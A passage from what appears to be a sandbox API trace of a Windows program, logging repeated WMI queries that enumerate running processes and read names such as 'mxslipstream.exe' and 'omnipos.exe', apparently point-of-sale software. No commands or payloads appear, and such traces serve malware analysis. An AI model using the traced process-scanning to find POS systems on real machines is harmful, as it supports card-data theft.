Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.680] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ed1a38, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed0ca8) returned 0x0 [0225.680] WbemDefPath:IUnknown:Release (This=0x5ed1a38) returned 0x0 [0225.680] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ca8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed0ca8) returned 0x0 [0225.680] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ca8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.680] WbemDefPath:IUnknown:AddRef (This=0x5ed0ca8) returned 0x3 [0225.680] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ca8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.680] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ca8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.680] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ca8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ed1a48) returned 0x0 [0225.680] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ed1a48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.681] WbemDefPath:IUnknown:Release (This=0x5ed1a48) returned 0x3 [0225.681] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.681] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ca8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.681] WbemDefPath:IUnknown:Release (This=0x5ed0ca8) returned 0x2 [0225.681] WbemDefPath:IUnknown:Release (This=0x5ed0ca8) returned 0x1 [0225.681] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.681] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ca8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed0ca8) returned 0x0 [0225.681] WbemDefPath:IUnknown:AddRef (This=0x5ed0ca8) returned 0x3 [0225.681] WbemDefPath:IUnknown:Release (This=0x5ed0ca8) returned 0x2 [0225.681] WbemDefPath:IWbemPath:SetText (This=0x5ed0ca8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2828\"") returned 0x0 [0225.681] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.681] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.681] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.681] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.681] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.681] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.681] IWbemClassObject:Get (in: This=0x5ecdf60, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ffc90*=0, plFlavor=0x26ffc94*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="mxslipstream.exe", varVal2=0x0), pType=0x26ffc90*=8, plFlavor=0x26ffc94*=0) returned 0x0 [0225.682] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0225.682] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0225.682] IWbemClassObject:Get (in: This=0x5ecdf60, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ffc90*=8, plFlavor=0x26ffc94*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="mxslipstream.exe", varVal2=0x0), pType=0x26ffc90*=8, plFlavor=0x26ffc94*=0) returned 0x0 [0225.682] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0225.682] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0225.682] CoTaskMemAlloc (cb=0x4) returned 0x5ed1a78 [0225.682] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ed1a78, puReturned=0x26dde18 | out: apObjects=0x5ed1a78*=0x5ece0f8, puReturned=0x26dde18*=0x1) returned 0x0 [0225.683] IUnknown:QueryInterface (in: This=0x5ece0f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ece0f8) returned 0x0 [0225.683] IUnknown:QueryInterface (in: This=0x5ece0f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.683] IUnknown:QueryInterface (in: This=0x5ece0f8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.683] IUnknown:AddRef (This=0x5ece0f8) returned 0x3 [0225.683] IUnknown:QueryInterface (in: This=0x5ece0f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.683] IUnknown:QueryInterface (in: This=0x5ece0f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.683] IUnknown:QueryInterface (in: This=0x5ece0f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ece0fc) returned 0x0 [0225.683] IMarshal:GetUnmarshalClass (in: This=0x5ece0fc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.683] IUnknown:Release (This=0x5ece0fc) returned 0x3 [0225.683] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.684] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.684] IUnknown:QueryInterface (in: This=0x5ece0f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.684] IUnknown:Release (This=0x5ece0f8) returned 0x2 [0225.684] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.684] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.684] IUnknown:QueryInterface (in: This=0x5ece0f8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ece0f8) returned 0x0 [0225.684] IUnknown:AddRef (This=0x5ece0f8) returned 0x4 [0225.684] IUnknown:Release (This=0x5ece0f8) returned 0x3 [0225.684] IUnknown:Release (This=0x5ece0f8) returned 0x2 [0225.684] CoTaskMemFree (pv=0x5ed1a78) [0225.684] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.684] IUnknown:AddRef (This=0x5ece0f8) returned 0x3 [0225.684] IWbemClassObject:Get (in: This=0x5ece0f8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.685] IWbemClassObject:Get (in: This=0x5ece0f8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2836\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.685] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2836\"") returned 0x66 [0225.685] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2836\"") returned 0x66 [0225.685] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.685] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.685] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.685] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.686] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ed1a78) returned 0x0 [0225.686] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1a78, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.686] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ed1a78, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed0d88) returned 0x0 [0225.686] WbemDefPath:IUnknown:Release (This=0x5ed1a78) returned 0x0 [0225.686] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0d88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed0d88) returned 0x0 [0225.686] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0d88, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.686] WbemDefPath:IUnknown:AddRef (This=0x5ed0d88) returned 0x3 [0225.686] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0d88, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.686] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0d88, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.686] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0d88, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ed1a88) returned 0x0 [0225.687] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ed1a88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.687] WbemDefPath:IUnknown:Release (This=0x5ed1a88) returned 0x3 [0225.687] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.687] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0d88, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.687] WbemDefPath:IUnknown:Release (This=0x5ed0d88) returned 0x2 [0225.687] WbemDefPath:IUnknown:Release (This=0x5ed0d88) returned 0x1 [0225.687] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.687] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0d88, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed0d88) returned 0x0 [0225.687] WbemDefPath:IUnknown:AddRef (This=0x5ed0d88) returned 0x3 [0225.687] WbemDefPath:IUnknown:Release (This=0x5ed0d88) returned 0x2 [0225.687] WbemDefPath:IWbemPath:SetText (This=0x5ed0d88, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2836\"") returned 0x0 [0225.687] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.687] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.687] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.687] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.687] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.687] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.687] IWbemClassObject:Get (in: This=0x5ece0f8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2700514*=0, plFlavor=0x2700518*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="omnipos.exe", varVal2=0x0), pType=0x2700514*=8, plFlavor=0x2700518*=0) returned 0x0 [0225.687] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0225.687] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0225.688] IWbemClassObject:Get (in: This=0x5ece0f8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2700514*=8, plFlavor=0x2700518*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="omnipos.exe", varVal2=0x0), pType=0x2700514*=8, plFlavor=0x2700518*=0) returned 0x0 [0225.688] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0225.688] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0225.688] CoTaskMemAlloc (cb=0x4) returned 0x5ed1ab8 [0225.688] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ed1ab8, puReturned=0x26dde18 | out: apObjects=0x5ed1ab8*=0x5ece290, puReturned=0x26dde18*=0x1) returned 0x0 [0225.726] IUnknown:QueryInterface (in: This=0x5ece290, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ece290) returned 0x0 [0225.726] IUnknown:QueryInterface (in: This=0x5ece290, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.726] IUnknown:QueryInterface (in: This=0x5ece290, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.726] IUnknown:AddRef (This=0x5ece290) returned 0x3 [0225.726] IUnknown:QueryInterface (in: This=0x5ece290, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.726] IUnknown:QueryInterface (in: This=0x5ece290, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.726] IUnknown:QueryInterface (in: This=0x5ece290, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ece294) returned 0x0 [0225.726] IMarshal:GetUnmarshalClass (in: This=0x5ece294, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.726] IUnknown:Release (This=0x5ece294) returned 0x3 [0225.727] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.727] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.727] IUnknown:QueryInterface (in: This=0x5ece290, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.727] IUnknown:Release (This=0x5ece290) returned 0x2 [0225.727] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.727] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.727] IUnknown:QueryInterface (in: This=0x5ece290, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ece290) returned 0x0 [0225.727] IUnknown:AddRef (This=0x5ece290) returned 0x4 [0225.727] IUnknown:Release (This=0x5ece290) returned 0x3 [0225.727] IUnknown:Release (This=0x5ece290) returned 0x2 [0225.727] CoTaskMemFree (pv=0x5ed1ab8) [0225.727] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.727] IUnknown:AddRef (This=0x5ece290) returned 0x3 [0225.727] IWbemClassObject:Get (in: This=0x5ece290, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.728] IWbemClassObject:Get (in: This=0x5ece290, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2844\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.728] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2844\"") returned 0x66 [0225.728] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2844\"") returned 0x66 [0225.728] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 